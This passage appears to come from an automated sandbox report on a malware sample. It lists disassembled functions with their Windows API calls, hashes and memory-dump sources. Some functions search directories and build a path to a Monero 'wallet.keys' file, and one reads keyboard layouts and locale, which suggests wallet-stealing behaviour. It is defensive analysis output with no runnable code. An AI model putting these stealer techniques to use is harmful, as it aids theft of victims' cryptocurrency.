                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C10C2E), ref: 00BFDE5E
                          • StrCmpCA.SHLWAPI(?,00C114C8), ref: 00BFDEAE
                          • StrCmpCA.SHLWAPI(?,00C114CC), ref: 00BFDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00BFE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 834c997ec0daa9bc3bc67c600e183f050ec2d788e4d9330d59b487274d1538e9
                          • Instruction ID: fb5a1f2df36a105ef17f0aa2895c2bccef257f3f88791614c24c74147f8541d0
                          • Opcode Fuzzy Hash: 834c997ec0daa9bc3bc67c600e183f050ec2d788e4d9330d59b487274d1538e9
                          • Instruction Fuzzy Hash: 68F190719202189ADB15FB61DC95FEE7378BF14300F4042E9A51A620D1EF346F89DF52
                          Function 00FB69E8 Relevance: 14.0, Strings: 10, Instructions: 1498COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /Z1>$94FB$Pw$SPE~$YQ_$Yy|$dvj]$eo1k$t7g$wh~
                          • API String ID: 0-777395225
                          • Opcode ID: c3dd633101c4bfa5d72ae7ee44bb98e067409cfd9ed7df34fc0a6b5272e57eb8
                          • Instruction ID: eb199a411f7c27599641d8a8b7e5175460b4b0a66c17b0656908eeb3723e26b3
                          • Opcode Fuzzy Hash: c3dd633101c4bfa5d72ae7ee44bb98e067409cfd9ed7df34fc0a6b5272e57eb8
                          • Instruction Fuzzy Hash: C7A237F360C204AFE7046E2DEC4567AFBE9EF94720F164A3DEAC487740EA3558048697
                          Function 00BFDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C114B0,00C10C2A), ref: 00BFDAEB
                          • StrCmpCA.SHLWAPI(?,00C114B4), ref: 00BFDB33
                          • StrCmpCA.SHLWAPI(?,00C114B8), ref: 00BFDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00BFDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 78b35256503c5a616edc65bc5f915c884ce7eccf88b83e3aadbd6f14b255dffa
                          • Instruction ID: 8b2a776c00a94f810894ccc94eac7d0bf3ccd0354791ad6816b742812584ca86
                          • Opcode Fuzzy Hash: 78b35256503c5a616edc65bc5f915c884ce7eccf88b83e3aadbd6f14b255dffa
                          • Instruction Fuzzy Hash: 9D9100729002089BCB14FB74DC9AAFD777DAB94300F408668B94A971C1EE349B5DDB92
                          Function 00FB3405 Relevance: 12.8, Strings: 9, Instructions: 1595COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *M]$+$vW$A$}b$S/<$TU$c/<$c;V}$~"/$ZKn
                          • API String ID: 0-2432471437
                          • Opcode ID: b89fdf7ca68ce864ddca7ee933a5791331ebe01fc6a4e5a4d1ada9c7b9ebbcd7
                          • Instruction ID: 1e51781bed4bf48b9ff0830fe0971b23eedc8504c629f90b38995938d4b701fe
                          • Opcode Fuzzy Hash: b89fdf7ca68ce864ddca7ee933a5791331ebe01fc6a4e5a4d1ada9c7b9ebbcd7
                          • Instruction Fuzzy Hash: C3B207F3A0C2009FE3046E2DEC8567ABBE9EF94720F1A493DEAC5C7744E63558058697
                          Function 00FAE35E Relevance: 11.6, Strings: 8, Instructions: 1638COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -!A$@DOs${cg$|^=$o[$N|g$N|g$Rg
                          • API String ID: 0-2872453939
                          • Opcode ID: 1a4bb9907c88632fadbbdf02320ec303d5fbbb48ac3146026bcedd408af7d2c7
                          • Instruction ID: 2a344029c1bc55576e1ac52e79cbd450e7062812a34282ce5b9dabd884332716
                          • Opcode Fuzzy Hash: 1a4bb9907c88632fadbbdf02320ec303d5fbbb48ac3146026bcedd408af7d2c7
                          • Instruction Fuzzy Hash: 8BB229F360C2049FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058697
                          Function 00C07B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00C105AF), ref: 00C07BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00C07BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C07C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C07C62
                          • LocalFree.KERNEL32(00000000), ref: 00C07D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 29346d8900b395220a1a50ae009148f41503cdfc03b4315d9c71d22b5be80e16
                          • Instruction ID: ea4c4967bd4bc55b50fdc491def6ad789c28401a4bcabe756fcec337488c50f8
                          • Opcode Fuzzy Hash: 29346d8900b395220a1a50ae009148f41503cdfc03b4315d9c71d22b5be80e16
                          • Instruction Fuzzy Hash: 71416C7191021CABDB24DB94DC89BEEB778FF44700F204299E109621C0DB342F89DFA1
                          Function 00BFE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C10D73), ref: 00BFE4A2
                          • StrCmpCA.SHLWAPI(?,00C114F8), ref: 00BFE4F2
                          • StrCmpCA.SHLWAPI(?,00C114FC), ref: 00BFE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: e3e340e779b2337acf41c1327f59cd15ccabb23fe46e3b56191838bb801ae913
                          • Instruction ID: 5ec35304c6f4f1260f4fd2929f863bdc7836cc17942d5eeb7b414e2cd3f7e8bf
                          • Opcode Fuzzy Hash: e3e340e779b2337acf41c1327f59cd15ccabb23fe46e3b56191838bb801ae913
                          • Instruction Fuzzy Hash: 5C1244719102189ADB14FB60DD96EFE7379AF54300F4086A8B50AA60D1EF346F89DF92
                          Function 00FAAD0A Relevance: 9.2, Strings: 6, Instructions: 1667COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 5~~$WGog$_uu^$q5?$r/$sn]
                          • API String ID: 0-2276904910
                          • Opcode ID: a3066d580eb59d001d2a6264519e4dbf57b8a3b756b9e1cdd63bff706b384bec
                          • Instruction ID: 7186f3d9e6c322a60defb2a8f91e15f0a43fd36f7c7796423f9ef52c0cb904a1
                          • Opcode Fuzzy Hash: a3066d580eb59d001d2a6264519e4dbf57b8a3b756b9e1cdd63bff706b384bec
                          • Instruction Fuzzy Hash: 45B2E6F360C204AFE7046E2DEC8577ABBE9EF94720F16493DE6C4C7744EA3558018696
                          Function 00FB1998 Relevance: 9.1, Strings: 6, Instructions: 1642COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: W$;O$Aju$F?}$Qmz}$n
                          • API String ID: 0-1244549565
                          • Opcode ID: 3952b63269ddc7c5bc0a60e6b6d43268ed7645365a6baa6f0f421657a9aca569
                          • Instruction ID: 8842ffe18eb448dcf5f403ed653748d102123ea2edb9cec6d2e183d177a3cc28
                          • Opcode Fuzzy Hash: 3952b63269ddc7c5bc0a60e6b6d43268ed7645365a6baa6f0f421657a9aca569
                          • Instruction Fuzzy Hash: 00B20AF3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DE6C5C3744EA3598058696
                          Function 00FB0410 Relevance: 8.7, Strings: 6, Instructions: 1153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6$A_$RDO$RDO$]z?$Dr
                          • API String ID: 0-2234824041
                          • Opcode ID: 7d93f218f6ada6e7b01af00e2a3499f23e797247d23e8259b87807a1bf4c0642
                          • Instruction ID: 7140636c336b227dae35ada1f6a40be46f1706abc771ade8692cf14955df8a3a
                          • Opcode Fuzzy Hash: 7d93f218f6ada6e7b01af00e2a3499f23e797247d23e8259b87807a1bf4c0642
                          • Instruction Fuzzy Hash: 9582F6F3A0C2009FE3046E29EC8567AFBE5EF94720F16893DE6C487744EA3558458797
                          Function 00FB4E34 Relevance: 7.8, Strings: 5, Instructions: 1592COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
